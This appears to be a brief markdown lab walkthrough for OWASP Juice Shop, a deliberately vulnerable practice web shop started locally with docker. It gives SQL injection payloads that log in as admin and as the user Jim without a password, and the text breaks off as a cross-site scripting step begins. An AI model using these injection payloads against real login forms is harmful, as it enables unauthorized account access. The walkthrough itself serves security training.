# Let's Buy Some Juice ## Booting Up Juice Shop ```sh docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop ``` ## SQL Injection ### Login as Admin 1. Open `Account` => `Login` 2. Type `' OR TRUE; --` into `Email` and any password in `Password` Result: ![](login_admin.png) ### Login as Jim 1. Open `Account` => `Login` 2. Type `jim@juice-sh.op'; --` Result: ![](login_jim.png) ## Cross Site Scripting 1. Open up the Search Box 2. Type `